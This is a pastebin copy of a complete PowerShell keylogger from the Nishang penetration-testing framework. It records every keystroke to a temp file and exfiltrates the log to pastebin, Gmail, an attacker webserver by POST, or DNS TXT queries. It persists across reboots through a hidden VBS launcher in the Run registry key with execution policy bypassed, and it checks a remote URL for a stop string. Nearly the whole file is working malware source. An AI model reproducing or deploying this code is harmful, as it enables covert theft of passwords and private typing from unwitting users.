SHOW:
|
|
- or go back to the newest paste.
1 | <# | |
2 | .SYNOPSIS | |
3 | Nishang Payload which logs keys. | |
4 | ||
5 | .DESCRIPTION | |
6 | This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory. | |
7 | The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded | |
8 | using the Parse_Key script in nishang. | |
9 | ||
10 | .PARAMETER persist | |
11 | Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access. | |
12 | ||
13 | .PARAMETER ExfilOption | |
14 | The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS". | |
15 | ||
16 | .PARAMETER dev_key | |
17 | The Unique API key provided by pastebin when you register a free account. | |
18 | Unused for other options | |
19 | ||
20 | .PARAMETER username | |
21 | Username for the pastebin/gmail account where data would be exfiltrated. | |
22 | Unused for other options | |
23 | ||
24 | .PARAMETER password | |
25 | Password for the pastebin/gmail account where data would be exfiltrated. | |
26 | Unused for other options | |
27 | ||
28 | .PARAMETER URL | |
29 | The URL of the webserver where POST requests would be sent. | |
30 | ||
31 | .PARAMETER DomainName | |
32 | The DomainName, whose subdomains would be used for sending TXT queries to. | |
33 | ||
34 | .PARAMETER AuthNS | |
35 | Authoritative Name Server for the domain specified in DomainName | |
36 | ||
37 | .PARAMETER MagicString | |
38 | The string which when found at CheckURL will stop the keylogger. | |
39 | ||
40 | .PARAMETER CheckURL | |
41 | The URL which would contain the MagicString used to stop keylogging. | |
42 | ||
43 | .EXAMPLE | |
44 | PS > .\Keylogger.ps1 | |
45 | The payload will ask for all required options. | |
46 | ||
47 | .EXAMPLE | |
48 | PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis | |
49 | Use above when using the payload from non-interactive shells and no exfiltration is required. | |
50 | ||
51 | .EXAMPLE | |
52 | PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php | |
53 | Use above for exfiltration to a webserver which logs POST requests | |
54 | ||
55 | ||
56 | .EXAMPLE | |
57 | PS > .\Keylogger.ps1 -persist | |
58 | ||
59 | Use above for reboot persistence. | |
60 | ||
61 | .LINK | |
62 | http://labofapenetrationtester.com/ | |
63 | https://github.com/samratashok/nishang | |
64 | #> | |
65 | ||
66 | [CmdletBinding(DefaultParameterSetName="noexfil")] Param( | |
67 | [Parameter(Parametersetname="exfil")] | |
68 | [Switch] | |
69 | $persist, | |
70 | ||
71 | [Parameter(Parametersetname="exfil")] | |
72 | [Switch] | |
73 | $exfil, | |
74 | ||
75 | [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")] | |
76 | [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")] | |
77 | [String] | |
78 | $CheckURL, | |
79 | ||
80 | [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")] | |
81 | [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")] | |
82 | [String] | |
83 | $MagicString, | |
84 | ||
85 | [Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")] | |
86 | [String] | |
87 | $ExfilOption, | |
88 | ||
89 | [Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")] | |
90 | [String] | |
91 | $dev_key = "null", | |
92 | ||
93 | [Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] | |
94 | [String] | |
95 | $username = "null", | |
96 | ||
97 | [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")] | |
98 | [String] | |
99 | $password = "null", | |
100 | ||
101 | [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")] | |
102 | [String] | |
103 | $URL = "null", | |
104 | ||
105 | [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")] | |
106 | [String] | |
107 | $DomainName = "null", | |
108 | ||
109 | [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")] | |
110 | [String] | |
111 | $AuthNS = "null" | |
112 | ||
113 | ) | |
114 | ||
115 | ||
116 | ||
117 | $functions = { | |
118 | ||
119 | function script:Keylogger | |
120 | { | |
121 | Param ( | |
122 | [Parameter(Position = 0, Mandatory = $True)] | |
123 | [String] | |
124 | $MagicString, | |
125 | ||
126 | [Parameter(Position = 1, Mandatory = $True)] | |
127 | [String] | |
128 | $CheckURL | |
129 | ) | |
130 | ||
131 | $signature = @" | |
132 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
133 | public static extern short GetAsyncKeyState(int virtualKeyCode); | |
134 | "@ | |
135 | $getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru | |
136 | $check = 0 | |
137 | while ($true) | |
138 | { | |
139 | Start-Sleep -Milliseconds 40 | |
140 | $logged = "" | |
141 | $result="" | |
142 | $shift_state="" | |
143 | $caps_state="" | |
144 | for ($char=1;$char -le 254;$char++) | |
145 | { | |
146 | $vkey = $char | |
147 | $logged = $getKeyState::GetAsyncKeyState($vkey) | |
148 | if ($logged -eq -32767) | |
149 | { | |
150 | if(($vkey -ge 48) -and ($vkey -le 57)) | |
151 | { | |
152 | $left_shift_state = $getKeyState::GetAsyncKeyState(160) | |
153 | $right_shift_state = $getKeyState::GetAsyncKeyState(161) | |
154 | if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) | |
155 | { | |
156 | $result = "S-" + $vkey | |
157 | } | |
158 | else | |
159 | { | |
160 | $result = $vkey | |
161 | } | |
162 | } | |
163 | elseif(($vkey -ge 64) -and ($vkey -le 90)) | |
164 | { | |
165 | $left_shift_state = $getKeyState::GetAsyncKeyState(160) | |
166 | $right_shift_state = $getKeyState::GetAsyncKeyState(161) | |
167 | $caps_state = [console]::CapsLock | |
168 | if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state) | |
169 | { | |
170 | $result = "S-" + $vkey | |
171 | } | |
172 | else | |
173 | { | |
174 | $result = $vkey | |
175 | } | |
176 | } | |
177 | elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222))) | |
178 | { | |
179 | $left_shift_state = $getKeyState::GetAsyncKeyState(160) | |
180 | $right_shift_state = $getKeyState::GetAsyncKeyState(161) | |
181 | if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) | |
182 | { | |
183 | $result = "S-" + $vkey | |
184 | } | |
185 | else | |
186 | { | |
187 | $result = $vkey | |
188 | } | |
189 | } | |
190 | else | |
191 | { | |
192 | $result = $vkey | |
193 | } | |
194 | $now = Get-Date; | |
195 | $logLine = "$result " | |
196 | $filename = "$env:temp\key.log" | |
197 | Out-File -FilePath $fileName -Append -InputObject "$logLine" | |
198 | ||
199 | } | |
200 | } | |
201 | $check++ | |
202 | if ($check -eq 6000) | |
203 | { | |
204 | $webclient = New-Object System.Net.WebClient | |
205 | $filecontent = $webclient.DownloadString("$CheckURL") | |
206 | if ($filecontent -eq $MagicString) | |
207 | { | |
208 | break | |
209 | } | |
210 | $check = 0 | |
211 | } | |
212 | } | |
213 | } | |
214 | ||
215 | function Keypaste | |
216 | { | |
217 | Param ( | |
218 | [Parameter(Position = 0, Mandatory = $True)] | |
219 | [String] | |
220 | $ExfilOption, | |
221 | ||
222 | [Parameter(Position = 1, Mandatory = $True)] | |
223 | [String] | |
224 | $dev_key, | |
225 | ||
226 | [Parameter(Position = 2, Mandatory = $True)] | |
227 | [String] | |
228 | $username, | |
229 | ||
230 | [Parameter(Position = 3, Mandatory = $True)] | |
231 | [String] | |
232 | $password, | |
233 | ||
234 | [Parameter(Position = 4, Mandatory = $True)] | |
235 | [String] | |
236 | $URL, | |
237 | ||
238 | [Parameter(Position = 5, Mandatory = $True)] | |
239 | [String] | |
240 | $AuthNS, | |
241 | ||
242 | [Parameter(Position = 6, Mandatory = $True)] | |
243 | [String] | |
244 | $MagicString, | |
245 | ||
246 | [Parameter(Position = 7, Mandatory = $True)] | |
247 | [String] | |
248 | $CheckURL | |
249 | ) | |
250 | ||
251 | $check = 0 | |
252 | while($true) | |
253 | { | |
254 | $read = 0 | |
255 | Start-Sleep -Seconds 5 | |
256 | $pastevalue=Get-Content $env:temp\key.log | |
257 | $read++ | |
258 | if ($read -eq 30) | |
259 | { | |
260 | Out-File -FilePath $env:temp\key.log -Force -InputObject " " | |
261 | $read = 0 | |
262 | } | |
263 | $now = Get-Date; | |
264 | $name = $env:COMPUTERNAME | |
265 | $paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff") | |
266 | function post_http($url,$parameters) | |
267 | { | |
268 | $http_request = New-Object -ComObject Msxml2.XMLHTTP | |
269 | $http_request.open("POST", $url, $false) | |
270 | $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") | |
271 | $http_request.setRequestHeader("Content-length", $parameters.length); | |
272 | $http_request.setRequestHeader("Connection", "close") | |
273 | $http_request.send($parameters) | |
274 | $script:session_key=$http_request.responseText | |
275 | } | |
276 | ||
277 | function Compress-Encode | |
278 | { | |
279 | #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html | |
280 | $ms = New-Object IO.MemoryStream | |
281 | $action = [IO.Compression.CompressionMode]::Compress | |
282 | $cs = New-Object IO.Compression.DeflateStream ($ms,$action) | |
283 | $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII) | |
284 | $pastevalue | ForEach-Object {$sw.WriteLine($_)} | |
285 | $sw.Close() | |
286 | # Base64 encode stream | |
287 | $code = [Convert]::ToBase64String($ms.ToArray()) | |
288 | return $code | |
289 | } | |
290 | ||
291 | if ($exfiloption -eq "pastebin") | |
292 | { | |
293 | $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data) | |
294 | $pastevalue = [System.Convert]::ToBase64String($utfbytes) | |
295 | post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password" | |
296 | post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2" | |
297 | } | |
298 | ||
299 | elseif ($exfiloption -eq "gmail") | |
300 | { | |
301 | #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage | |
302 | $smtpserver = "smtp.gmail.com" | |
303 | $msg = new-object Net.Mail.MailMessage | |
304 | $smtp = new-object Net.Mail.SmtpClient($smtpServer ) | |
305 | $smtp.EnableSsl = $True | |
306 | $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password"); | |
307 | $msg.From = "$username@gmail.com" | |
308 | $msg.To.Add("$username@gmail.com") | |
309 | $msg.Subject = $pastename | |
310 | $msg.Body = $pastevalue | |
311 | if ($filename) | |
312 | { | |
313 | $att = new-object Net.Mail.Attachment($filename) | |
314 | $msg.Attachments.Add($att) | |
315 | } | |
316 | $smtp.Send($msg) | |
317 | } | |
318 | ||
319 | elseif ($exfiloption -eq "webserver") | |
320 | { | |
321 | $Data = Compress-Encode | |
322 | post_http $URL $Data | |
323 | } | |
324 | elseif ($ExfilOption -eq "DNS") | |
325 | { | |
326 | $lengthofsubstr = 0 | |
327 | $code = Compress-Encode | |
328 | $queries = [int]($code.Length/63) | |
329 | while ($queries -ne 0) | |
330 | { | |
331 | $querystring = $code.Substring($lengthofsubstr,63) | |
332 | Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS" | |
333 | $lengthofsubstr += 63 | |
334 | $queries -= 1 | |
335 | } | |
336 | $mod = $code.Length%63 | |
337 | $query = $code.Substring($code.Length - $mod, $mod) | |
338 | Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS" | |
339 | ||
340 | } | |
341 | ||
342 | $check++ | |
343 | if ($check -eq 6000) | |
344 | { | |
345 | $check = 0 | |
346 | $webclient = New-Object System.Net.WebClient | |
347 | $filecontent = $webclient.DownloadString("$CheckURL") | |
348 | if ($filecontent -eq $MagicString) | |
349 | { | |
350 | break | |
351 | } | |
352 | } | |
353 | } | |
354 | } | |
355 | } | |
356 | ||
357 | ||
358 | ||
359 | $modulename = $script:MyInvocation.MyCommand.Name | |
360 | if($persist -eq $True) | |
361 | { | |
362 | $name = "persist.vbs" | |
363 | $options = "start-job -InitializationScript `$functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)" | |
364 | $options2 = "start-job -InitializationScript `$functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)" | |
365 | $func = $functions.Tostring() | |
366 | Out-File -InputObject '$functions = {' -Force $env:TEMP\$modulename | |
367 | Out-File -InputObject $func -Append $env:TEMP\$modulename | |
368 | Out-File -InputObject '}' -Append -NoClobber $env:TEMP\$modulename | |
369 | Out-File -InputObject $options -Append -NoClobber $env:TEMP\$modulename | |
370 | Out-File -InputObject $options2 -Append -NoClobber $env:TEMP\$modulename | |
371 | ||
372 | New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force | |
373 | echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name | |
374 | echo "objShell.run(`"powershell -noexit -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name | |
375 | ||
376 | } | |
377 | ||
378 | else | |
379 | { | |
380 | if ($exfil -eq $True) | |
381 | { | |
382 | start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL) | |
383 | start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL) | |
384 | } | |
385 | else | |
386 | { | |
387 | start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL) | |
388 | } | |
389 | } |